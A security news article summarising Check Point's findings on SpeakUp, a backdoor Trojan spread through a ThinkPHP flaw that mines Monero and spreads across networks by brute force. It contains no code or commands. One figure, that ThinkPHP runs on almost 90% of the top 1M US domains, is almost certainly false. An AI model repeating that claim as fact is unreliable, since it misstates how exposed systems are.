The IT security researchers at Check Point have identified a new malware called SpeakUp targeting Linux and macOS – The new findings prove that there has been a surge in malware attacks against Linux and Apple devices.
SpeakUp is a new backdoor Trojan that is being distributed by cybercriminals through a malicious new campaign designed to target servers running six different Linux versions and macOS systems. The malware manages to target multiple previously identified security flaws and can evade antivirus programs effectively.
Check Point researchers noted that the hackers are utilizing the exploit for ThinkPHP (CVE-2018-20062) remote code execution flaw for infecting Linux and macOS servers. Hackers often prefer backdoor Trojans because this malware can allow them easy access to compromised devices and also let them control the infected devices by establishing a connection with a C&C server. Usually, such malware help attackers in running campaigns to gain full control of the machine.
While the exact identity of the threat actor behind this new attack is still unconfirmed, Check Point Researchers were able to correlate SpeakUp’s author with malware developer under the name of Zettabit. Although SpeakUp is implemented differently, it has a lot in common with Zettabit’s craftsmanship, said researchers in their blog post.
According to researchers, SpeakUp exploits ThinkPHP, which is a framework that almost 90% of the leading 1M domains in America use. Furthermore, it can infect Mac machines without getting detected, which is a phenomenal capability. At the moment, SpeakUp is mainly targeting devices in East Asia, Latin America, and mostly AWS hosted devices are its prime victims. Approx. 70,000 servers across the globe are targeted in this campaign.
Check Point researchers, who identified the campaign around three weeks back, assessed that exploiting the ThinkPHP vulnerability is only the initial attack vector that helps the Trojan infect the device. Later, the hackers modify the local cron utility to obtain boot persistence, execute files that are downloaded from a remote C&C server, run shell commands, and uninstall or upgrade itself.
Moreover, SpeakUp has a built-in Python script that lets the malware to spread alongside the local network. The Python script scans local networks to locate open ports as well as brute-forces systems that it identifies in the nearest vicinity. This is performed using a list of pre-defined login credentials.
It also uses seven different exploits including remote command execution and Oracle WebLogic Server component of Oracle Fusion Middleware, etc., to control unpatched systems. After infecting new machines the malware deploys itself on the systems.
Apparently, the attackers are using SpeakUp to deploy Monero cryptocurrency miners on infected devices and so far, the group has managed to make 107 Monero coins (around $4,500). Although currently, the attackers are exploiting the Chinese PHP framework it is also possible that they switch to other exploits to further expand the scope of their backdoor and the range of targets. However, they haven’t yet targeted anything other than ThinkPHP framework.